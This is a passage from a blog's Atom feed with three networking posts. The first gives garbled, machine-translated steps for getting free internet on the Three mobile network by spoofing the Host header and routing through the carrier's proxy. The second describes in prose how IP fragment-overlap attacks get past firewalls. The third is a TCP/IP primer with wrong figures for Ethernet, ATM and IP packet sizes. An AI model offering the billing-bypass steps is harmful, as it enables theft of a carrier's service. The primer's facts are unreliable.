untuk terjemahan alternatif" class="hps"&gt;klo&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;gini&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxomitron&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;nihhh&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;click&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;headers&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;New&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;fill&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the following&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;kek&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;HTTP&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Headers&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;=&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;host&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;:&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;three&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Header&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Value&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Match&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;=&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;*&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;replacement&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;text&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;=&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;mms.three.co.id&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;mms.hutch.co.id&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;also&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;abis&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tu&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;click&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;OK&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;check&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Out&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;OK&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;click&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Proxy&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;fill&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;his column&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;10.4.0.10:3128&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;dg&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;OK&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Active&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Filters&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the frame&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tick&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;use&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;a remote&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxy&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;browser&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxy settings&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;127.0.0.1:8080&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps atn"&gt;[&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;let me&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;listen&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxomitron&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;]&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;such as&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;mozilla&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;firefox&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;, go&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Tools&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Options&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Advanced&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Network&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Settings&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;select&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;manual&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxy&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;configuration&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;abis&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tu&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;contents&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;HTTP&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Proxy&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;=&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;127.0.0.1&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;port&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;=&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;8080&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;check&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;use&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;this&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxy&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;server&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;for&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;all&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;protocols&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;...&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;klo&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;pake&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;modify&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;header&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;special&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tu&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;firefox&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;download&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;here&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;addons'nya&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;click&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tools&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;modify&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;header&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;select&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;add&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;ato&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Modify&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;name&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;filled&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;=&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;host&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;value&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;=&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;mms.hutch.co.id&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;filled&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;abis&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tu&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;enable'kan&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;then&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;click&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;Add&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;change&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxy&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;firefoxnya&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;so&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;10.4.0.10&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;port&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;3128&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;APN settings&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;a user&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;password&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;when&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the dial&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;is filled&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;ama&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;3mms&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;everything&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;ane&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;more&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;recommended&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;first&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;trick&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;because&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;open&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the https&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;pake&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;klo&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;who&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;can not&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;modify&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;header&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;mah&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt;&lt;/font&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-4008698682831507475?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/4008698682831507475/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/02/internet-free-three.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4008698682831507475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4008698682831507475'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/02/internet-free-three.html' title='Internet Free three'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_KpkJZUIPOWs/TLR6GM27fjI/AAAAAAAAAA8/KowT6mrrrhA/s72-c/three_sonybmg_crave1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-237661506511829810</id><published>2011-02-14T12:25:00.000-08:00</published><updated>2011-02-14T12:37:39.662-08:00</updated><title type='text'>TCP Packets port</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-AQJIF_rolKo/TVmSRDh1DTI/AAAAAAAAAGA/tPe--jGhbFs/s1600/tcp_ip_layers.gif"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 320px; height: 246px;" src="http://1.bp.blogspot.com/-AQJIF_rolKo/TVmSRDh1DTI/AAAAAAAAAGA/tPe--jGhbFs/s320/tcp_ip_layers.gif" alt="" id="BLOGGER_PHOTO_ID_5573646835550326066" border="0" /&gt;&lt;/a&gt;Packet fragmentation is the part of the Internet Protocol (IP) suite of&lt;br /&gt;networking protocols that assures that IP datagrams can flow through any&lt;br /&gt;other sort of network. (For details, see Internet Request For Comments 791&lt;br /&gt;(rfc791) and are available and searchable in electronic form from Info-Sec&lt;br /&gt;heaven on the World-Wide-Web at http://all.net, through gopher service at&lt;br /&gt;all.net, or by ftp service from rs.internic.net.) Fragmentation works by&lt;br /&gt;allowing datagrams created as a single packet to be split into many smaller&lt;br /&gt;packets for transmission and reassembled at the receiving host.&lt;br /&gt;Packet fragmentation is necessary because underlying the IP protocol, other&lt;br /&gt;physical and or logical protocols are used to transport packets through&lt;br /&gt;networks. A good example of this phenomena is on the difference between&lt;br /&gt;Ethernet packets (which are limited to 1024 bytes), ATM packets (which are&lt;br /&gt;limited to 56 bytes), and IP packets which have variable sizes up to about&lt;br /&gt;1/2 million bytes in length.&lt;br /&gt;The only exception to this rule is in the case of an internet datagram&lt;br /&gt;marked don't fragment . Any internet datagram marked in this way is&lt;br /&gt;supposed to not be fragmented under any circumstances. If internet&lt;br /&gt;datagrams marked don't fragment cannot be delivered to their destination&lt;br /&gt;without being fragmented, they are supposed to be discarded instead. Of&lt;br /&gt;course, this rule doesn't have to be obeyed by the IP software actually&lt;br /&gt;processing packets, but it is supposed to be.&lt;br /&gt;How Packet Reassembly Attacks Work&lt;br /&gt;The packet fragmentation mechanism leads to attacks that bypass many&lt;br /&gt;current Internet firewalls, but the reason these attacks work is not&lt;br /&gt;because of the way fragmentation is done, but rather because of the way&lt;br /&gt;datagrams are reassembled.&lt;br /&gt;Datagrams are supposed to be fragmented into packets that leave the header&lt;br /&gt;portion of the packet intact except for the modification of the fragmented&lt;br /&gt;packet bit and the filling in of an offset field in the IP header that&lt;br /&gt;indicates at which byte in the whole datagram the current packet is&lt;br /&gt;supposed to start. In reassembly, the IP reassembler creates a temporary&lt;br /&gt;packet with the fragmented part of the datagram in place and adds incoming&lt;br /&gt;fragments by placing their data fields at the specified offsets within the&lt;br /&gt;datagram being reassembled. Once the whole datagram is reassembled, it is&lt;br /&gt;processed as if it came in as a single packet.&lt;br /&gt;According to the IP specification, fragmented packets are to be reassembled&lt;br /&gt;at the receiving host. This presumably means that they are not supposed to&lt;br /&gt;be reassembled at intermediate sites such as firewalls or routers. This&lt;br /&gt;decision was made presumably to prevent repeated reassembly and&lt;br /&gt;refragmentation in intermediate networks. When routers and firewalls&lt;br /&gt;followed the rules, they found a peculiar problem.&lt;br /&gt;The way firewalls and routers block specific services (such as telnet )&lt;br /&gt;while allowing other services (such as the world wide web http service) is&lt;br /&gt;by looking into the IP packet to determine which Transfer Control Protocol&lt;br /&gt;(TCP) port is being used. If the port corresponds to 80, the datagram is&lt;br /&gt;destined for http service, while port 23 is used for telnet . In normal&lt;br /&gt;datagrams, this works fine. But suppose we didn't follow the rules for&lt;br /&gt;fragmentation and created improper fragmented packets? Here's what one&lt;br /&gt;attacker did:&lt;br /&gt;  *  Create an initial packet which claims to be the first fragment of a&lt;br /&gt;    multi-packet datagram. Specify TCP port 80 in the TCP header so it&lt;br /&gt;    looks like a datagram going to http service, which is allowed to pass&lt;br /&gt;    the firewall.&lt;br /&gt;  *  The firewall passes the packet to the host under attack and passes&lt;br /&gt;    subsequent packet fragments in order to allow the destination host to&lt;br /&gt;    reassemble the packet.&lt;br /&gt;  *  One of the subsequent packets has an offset of 0 which causes the&lt;br /&gt;    reassembler to overwrite the initial part of the IP packet. This is&lt;br /&gt;    the part of the IP packet that specifies the TCP port. The attacker&lt;br /&gt;    overwrites the IP port number which was originally 80 with a new port&lt;br /&gt;    number such as 23, and is now granted telnet access to the host under&lt;br /&gt;    attack despite the firewall that is supposed to block the service.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-237661506511829810?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/237661506511829810/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/02/tcp-packets-port.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/237661506511829810'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/237661506511829810'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/02/tcp-packets-port.html' title='TCP Packets port'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-AQJIF_rolKo/TVmSRDh1DTI/AAAAAAAAAGA/tPe--jGhbFs/s72-c/tcp_ip_layers.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-4123508427134771902</id><published>2011-02-08T03:32:00.000-08:00</published><updated>2011-02-08T03:36:19.946-08:00</updated><title type='text'>TCP/IP</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nLUUYT3afN4/TVEqdkNoicI/AAAAAAAAAEY/bvQJsQouWrk/s1600/tcp.jpg"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 320px; height: 192px;" src="http://2.bp.blogspot.com/_nLUUYT3afN4/TVEqdkNoicI/AAAAAAAAAEY/bvQJsQouWrk/s320/tcp.jpg" alt="" id="BLOGGER_PHOTO_ID_5571280901459446210" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;TCP\IP or Transmission Control Protocol \ Internet Protocol is a stack or collection of various protocols. A&lt;br /&gt;protocol is basically the commands or instructions using which two computers within a local network or the&lt;br /&gt;Internet can exchange data or information and resources.&lt;br /&gt;&lt;br /&gt;Transmission Control Protocol \ Internet Protocol  or the TCP\IP  was developed around the time of the&lt;br /&gt;ARPAnet. It is also known as the Protocol Suite. It consists of various protocols but as the TCP&lt;br /&gt;(Transmission Control Protocol) and the IP (Internet Protocol) are the most, well known of the suite of&lt;br /&gt;protocols, the entire family or suite is called the TCP\IP suite.&lt;br /&gt;&lt;br /&gt;The TCP\ IP Suite is a stacked suite with various layers stacked on each other, each layer looking after one&lt;br /&gt;aspect of the data transfer. Data is transferred from one layer to the other. The Entire TCP\ IP suite can be&lt;br /&gt;broken down into the below layers-:&lt;br /&gt;&lt;br /&gt;Layer Name                                                  Protocol             &lt;br /&gt;&lt;br /&gt;Link Layer (Hardware, Ethernet)                ARP, RARP, PPP, Ether&lt;br /&gt;Network Layer(The Invisible Layer)           IP, ICMP&lt;br /&gt;Transport Layer                                           UDP, TCP&lt;br /&gt;Application Layer(The Visible Layer)        The Actual running Applications like-: FTP client, Browser&lt;br /&gt;Physical Layer (Not part of TCP \IP)          Physical Data Cables, Telephone wires&lt;br /&gt;&lt;br /&gt;Data travels from the Link Layer down to the Physical Layer at the source and at the destination it travels&lt;br /&gt;from the Physical Layer to the Link Layer. We will later discuss what each layer and each protocol does.&lt;br /&gt;&lt;br /&gt;The TCP\IP suite not only helps to transfer data but also has to correct various problems that might occur&lt;br /&gt;during the data transfer. There are basically two types of most common errors that might occur during the&lt;br /&gt;process of data transfer. They are-:&lt;br /&gt;&lt;br /&gt;Data Corruption -: In this kind of error, the data reaches the destination after getting corrupted.&lt;br /&gt;Data Loss -: In this kind of error, the entire collection of packets which constitute the data to be transferred&lt;br /&gt;does not reach the destination.&lt;br /&gt;&lt;br /&gt;TCP\IP expects such errors to take place and has certain features which prevent, such error which might&lt;br /&gt;occur.&lt;br /&gt;&lt;br /&gt;Checksums-: A checksum is a value (Normally, a 16 Bit Value) that is formed by summing up the Binary&lt;br /&gt;Data in the used program for a given data block. The program being used is responsible for the calculation&lt;br /&gt;of the Checksum value. The data being sent by the program sends this calculated checksum value, along&lt;br /&gt;with the data packets to the destination. When the program running at the destination receives the data&lt;br /&gt;packets, it re-calculates the Checksum value. If the Checksum value calculated by the Destination program&lt;br /&gt;matches with the Checksum Value attached to the Data Packets by the Source Program match, then the data&lt;br /&gt;transfer is said to be valid and error free. Checksum is calculated by adding up all the octets in a datagram.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Packet Sequencing-: All data being transferred on the net is broken down into packets at the source and&lt;br /&gt;joined together at the destination.  The data is  broken down into packets  in a particular sequence at the&lt;br /&gt;source.  This means that, for example, the first byte has the first sequence number and the second byte the&lt;br /&gt;second sequence number  and so on. These packets are free to travel independently on the net, so&lt;br /&gt;sometimes, when the data packets reach the destination they arrive, out of sequence, which means that the&lt;br /&gt;packet which had the first sequence number attached to it does not reach the destination first. Sequencing&lt;br /&gt;defines the order in which the hosts receive the data packets or messages. The application or the layer&lt;br /&gt;running at the destination automatically builds up the data from the sequence number in each packet.&lt;br /&gt;The source system breaks the data to be transferred into smaller packets and assigns each packet a unique&lt;br /&gt;sequence number. When the destination gets the packets, it's starts rearranging the packets by reading the&lt;br /&gt;sequence numbers of each packet to make the data received usable.&lt;br /&gt;&lt;br /&gt;For example, say you want to transfer a 18000 octet file.  Not all networks can handle the entire 18000&lt;br /&gt;octet packets  at a time. So the huge file is broken down into smaller say 300 octet packets. Each packet has&lt;br /&gt;been assigned a unique sequence number. Now when the packets reach the destination the packets are put&lt;br /&gt;back together to get the usable data. Now during the transportation process, as the packets can move&lt;br /&gt;independently on the net, it is possible that the packet 5 will arrive at the destination before packet 4&lt;br /&gt;arrives. In such a situation, the sequence numbers are used by the destination to rearrange the data packets&lt;br /&gt;in such a way that even if Data packet 5 arrived earlier, Packet 4 will always precede Packet 5.&lt;br /&gt;&lt;br /&gt;A data can easily be corrupted while it is being transferred from the source to the destination. Now if a&lt;br /&gt;error control service is running then if it detects data corruption, then it asks the source to re-send the&lt;br /&gt;packets of data. Thus only non corrupted data reaches the destination. An error control service detects and&lt;br /&gt;controls the same  two types of errors-:&lt;br /&gt;&lt;br /&gt;1.)  Data Loss&lt;br /&gt;2.) Data Corruption&lt;br /&gt;&lt;br /&gt;The Checksum values are used to detect if the data has been modified or corrupted during the transfer from&lt;br 